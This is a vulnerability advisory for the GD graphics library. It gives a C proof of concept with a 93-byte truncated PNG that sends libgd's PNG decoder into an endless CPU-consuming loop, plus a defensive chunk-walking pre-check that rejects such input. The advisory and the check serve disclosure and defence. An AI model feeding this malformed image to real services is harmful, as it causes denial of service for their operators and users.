GD is an open-source code library used to create graphics dynamically for web sites. The GD graphics library contains a vulnerability in the handling of malformed PNG images: a remote attacker can exploit it to send the affected application into an infinite loop. The libpng code in GD's PNG decoder (png_read_data()) and the libgd read callback (gdPngReadData()) do not correctly detect truncated input. The result is an endless loop in which libpng's png_read_info() never returns, and the library consumes 100% of the CPU.

Proof of concept (the truncated PNG ends after the ancillary chunks, before any IDAT or IEND chunk, so libpng keeps asking the callback for data that never arrives):

```c
/* id: gdbad3.c, Xavier Roche, May. 2007 */
/* gcc gdbad3.c -o bad -lgd && ./bad */
#include <stdio.h>
#include <stdlib.h>
#include "gd.h"

/* Forward declaration; the 93 bytes of truncated PNG data are defined below. */
static const unsigned char pngdata[93];

int main(void)
{
    gdImagePtr im;

    /* Decoding never completes: png_read_info() loops inside gdPngReadData(). */
    if ((im = gdImageCreateFromPngPtr(93, (char *) &pngdata[0])) != NULL) {
        fprintf(stderr, "success!\n");
        gdImageDestroy(im);
    } else {
        fprintf(stderr, "failed!\n");
    }
    return 0;
}

/* PNG data: signature, IHDR, bKGD, pHYs and vpAg chunks, then nothing (no IDAT, no IEND). */
static const unsigned char pngdata[93] = {137,80,78,71,13,10,26,10,0,0,
    0,13,73,72,68,82,0,0,0,120,0,0,0,131,8,6,0,0,0,70,49,223,8,0,0,0,6,98,
    75,71,68,0,255,0,255,0,255,160,189,167,147,0,0,0,9,112,72,89,115,0,0,92,
    70,0,0,92,70,1,20,148,67,65,0,0,0,9,118,112,65,103,0,0,0,120,0,0,0,131,
    0,226,13,249,45};
```

If you run the program under a debugger, go `up` to png_read_info() and try `finish`, you can see that the function never returns because gdPngReadData() is called endlessly.
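As an added example (not part of the advisory or of the PoC above), the following C code is a structural pre-check an application can run on untrusted PNG bytes before handing them to libgd/libpng: it walks the chunk list and rejects input that stops before IEND, which is exactly the shape of the 93-byte buffer above. The function name, the return codes and the minimal "complete" PNG are constructed for illustration; chunk CRCs are deliberately not verified.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum png_check { PNG_OK = 0, PNG_BAD_SIG, PNG_TRUNCATED, PNG_NO_IEND };

/* Big-endian 32-bit read (PNG chunk lengths are big-endian). */
static uint32_t be32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Walk the chunk list before the buffer reaches libgd/libpng.
 * Returns PNG_OK only if every chunk (4-byte length, 4-byte type, data, 4-byte CRC)
 * fits inside the buffer and the last chunk is IEND. CRCs are not checked here. */
int png_check_complete(const unsigned char *buf, size_t len) {
    static const unsigned char sig[8] = {137, 80, 78, 71, 13, 10, 26, 10};
    size_t off = 8;
    if (len < 8 || memcmp(buf, sig, 8) != 0) return PNG_BAD_SIG;
    while (off < len) {
        if (len - off < 12) return PNG_TRUNCATED;          /* cut inside a chunk header/CRC */
        uint32_t clen = be32(buf + off);
        if (clen > len - off - 12) return PNG_TRUNCATED;    /* data + CRC run past the end */
        if (memcmp(buf + off + 4, "IEND", 4) == 0) return PNG_OK;
        off += 12 + clen;
    }
    return PNG_NO_IEND;  /* ends cleanly on a chunk boundary, but IEND never arrived */
}

/* The 93-byte input from the advisory: signature, IHDR, bKGD, pHYs, vpAg, then nothing.
 * No IDAT or IEND ever arrives, which is what keeps png_read_info() asking for more. */
const unsigned char truncated_png[93] = {
    137,80,78,71,13,10,26,10, 0,0,0,13,73,72,68,82,0,0,0,120,0,0,0,131,8,6,0,0,0,70,49,223,8,
    0,0,0,6,98,75,71,68,0,255,0,255,0,255,160,189,167,147, 0,0,0,9,112,72,89,115,0,0,92,70,0,0,
    92,70,1,20,148,67,65, 0,0,0,9,118,112,65,103,0,0,0,120,0,0,0,131,0,226,13,249,45};

/* Constructed minimal complete PNG: IHDR, empty IDAT, IEND (CRC bytes are placeholders). */
const unsigned char complete_png[57] = {
    137,80,78,71,13,10,26,10, 0,0,0,13,'I','H','D','R',0,0,0,1,0,0,0,1,8,6,0,0,0,0,0,0,0,
    0,0,0,0,'I','D','A','T',0,0,0,0, 0,0,0,0,'I','E','N','D',0,0,0,0};

int main(void) {
    printf("advisory sample: %d\n", png_check_complete(truncated_png, sizeof truncated_png));
    printf("complete sample: %d\n", png_check_complete(complete_png, sizeof complete_png));
    return 0;
}
```

Any result other than PNG_OK means the decoder would be fed a stream it cannot finish, so the input should be rejected before gdImageCreateFromPngPtr() is called.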